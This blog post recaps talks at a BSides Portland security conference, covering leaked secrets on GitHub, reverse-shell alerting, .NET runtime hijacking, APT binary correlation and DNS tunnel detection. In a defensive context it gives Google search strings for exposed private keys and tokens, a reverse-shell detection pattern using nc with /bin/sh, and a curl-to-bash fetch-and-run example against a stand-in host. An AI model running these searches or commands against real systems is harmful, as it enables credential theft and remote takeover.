BSides PDX! My first BSides was last year and ever since, I’ve been counting down to this year’s event. For those of you who are not familiar with BSides, the idea behind it is to provide an easily accessible security conference at local venues around the world and to foster activity for the local security community. That being said, this year’s BSides Portland did not disappoint. Below are some highlights from some of my favorite talks.
Mike Ossmann: Your Ideas Are Worthless
Mike Ossmann delivered a thought-provoking keynote which really stuck with me. The title initially threw me off, implying that my ideas were worthless. Mike expanded on that title all throughout his keynote though – he explained that ideas are worthless, unless you share them.
He went on to explain his thought with an example of someone having a brilliant idea, but keeping it to themselves. No matter how brilliant or impacting this idea may be, it is truly worthless unless the idea is shared and acted upon.
I believe that message was a great way to kick-off BSides, a conference dedicated to sharing security research with the community.
Ben Hughes: Security for Non-Unicorns
Ben Hughes is a security engineer at Etsy, and he presented on many of the frustrations he has encountered securing infrastructure.
For instance, corporate infrastructure has evolved from systems behind a firewall to systems on both sides (thanks cloud!). From a security operations perspective, this means corporations need to protect their information, which lives on systems they may not have full control over.
A great example Ben showed was searching Google for GitHub security tokens and SSH keys (search Google for site:github.com dotfiles “BEGIN RSA PRIVATE KEY” and site:github.com dotfiles gitconfig token to get an idea). Developers can get sloppy and unintentionally post sensitive information to a project. Ben recommended organizations use GitRob to help them find sensitive information their developers may have accidentally uploaded.
Logging and alerting was another component Ben stressed, offering up some helpful hints when dealing with multi-line logs, such as using the multi-line filter for Logstash and alerting whenever your system sees “/bin/nc *-e /bin/sh*” (this being a common syntax for reverse shells).
Another great thing to lookout for is users piping downloaded shell scripts directly to their shell – for example, curl notevil.net/runThis.sh | bash. That will blindly run any script in your terminal, which obviously exposes a system to complete control to notevil.net. Despite its obvious issues, this is far more common than one would expect (see this Tumblr dedicated just to it).
Lastly, Ben touched on Docker security, more specifically on the lack of security in many Docker images. Some tips to stay secure are to not run things as root, use Docker Notary and implement GRSecurity or SELinux.
There were a few other topics Ben discussed, but these are the ones that stuck out to me the most. Check out the rest of his topics here.
Topher Timzen: Hijacking .NET Application Control Flow
Topher demoed his projects GrayFrost and GrayStorm, and how they can be used in conjunction to hijack .NET applications.
Yes, .NET is the framework we all love to hate. For those who need a quick and dirty tutorial, most programming languages are compiled into machine code, which is then delivered as binaries. .NET, similar to Java, is instead compiled to a common language runtime (CLR) which is then just-in-time (JIT) compiled to machine code at runtime.
This has many advantages but a glaring security disadvantage is that nefarious users can take advantage of JIT, reverse engineer the source code and inject their own values for variables.
Topher showed a simple attack in which he injected his GrayFrost dll into a .NET application then used GrayStorm to edit variables at runtime – this could be used to bypass authentication mechanisms, edit validated input and much more.
This is a tough pill to swallow for those in charge of securing .NET applications because even though developers can be trained to code securely (sanitize input, encrypt sensitive strings, etc.), .NET applications can still be undermined by the techniques Topher demonstrated.
Learn more about Topher’s presentation here and check out his GrayFrost and GrayStorm GitHub.
Bhavna Soman: Ninja Correlation of APT Binaries
Bhavna took an analytical approach to finding correlations between the MD5 hashes of APT binaries. She took several MD5 hashes and ran them through imphash, ssdeep and Sdhash. She then assessed any clustered for similar attributes relating to Actor Name, Campaign Name, Malware Family, or Aliases.
Her results show that the algorithms were able to identify similar APT binaries based on their MD5 hashes. I foresee this possibly being used to identify 0-day binaries based off previously discovered binaries by correlating their hashes.
Check out her presentation slides here.
Shadejinx: Tunnel Vision
Another of my favorite talks was done by Shadejinx, where he spoke about how he used logging tools to detect DNS tunnels in his environment. DNS tunneling is a technique used to stealthily extract data or communicate outside of a protected network. However, as Shadejinx pointed out, DNS tunnels in general are not very stealthy.
DNS, being a common protocol and essential to web browsing, is often allowed to exit an organization’s network, whereas other communication protocols that attacker’s prefer (such as SSH) are not. As a defender, detecting a DNS tunnel is essential to knowing if company data is unknowingly leaving your network or if a breach has occurred.
For those organization’s that use logging to their advantage, detecting DNS tunneling should be simple. As Shadejinx explained, in general DNS tunnels are very noisy – they create an extraordinary amount of DNS requests and their FQDNs are abnormally long.
Looking at one’s own dataset, an expected threshold of DNS requests and FQDN lengths should be derived, then some sort of alerting system should be in place for anything that does not match the chosen criteria. Shadejinx also provides a python tool on GitHub to help analysts parse through DNS log files and find evidence of DNS tunnels in their environment.
I spoke with Shadejinx briefly after his presentation and thanked him for doing a presentation from a blue team perspective. Many of the presentations at BSides were all about how to break things, so it was nice to see a defender providing some knowledge to the community about how to defend against an attack.
All in all, Bsides PDX was a great opportunity to learn more about current research, network with other infosec professionals, and even try some new things. For instance, this year’s Bsides PDX had a Lock Pick Village where you could learn to pick logs, a capture the flag station run by Vegan Zombies (Portland’s #1 CTF Team), and you could even mine Bitcoin.
Several workshops were also held to give attendees some hands-on exercises, such as learning to exploit hardware with JTAG, how to defend against UEFI attacks, or how to use crypto tools effectively – a fantastic value for a free* security conference!
A big thank you to the organizers and I look forward to next year’s edition! Be sure to follow @BSidesPDX on Twitter and check out the #bsidespdx hashtag to see what else you missed.
*Donations are always welcome, of course, and it gets you some more swag :)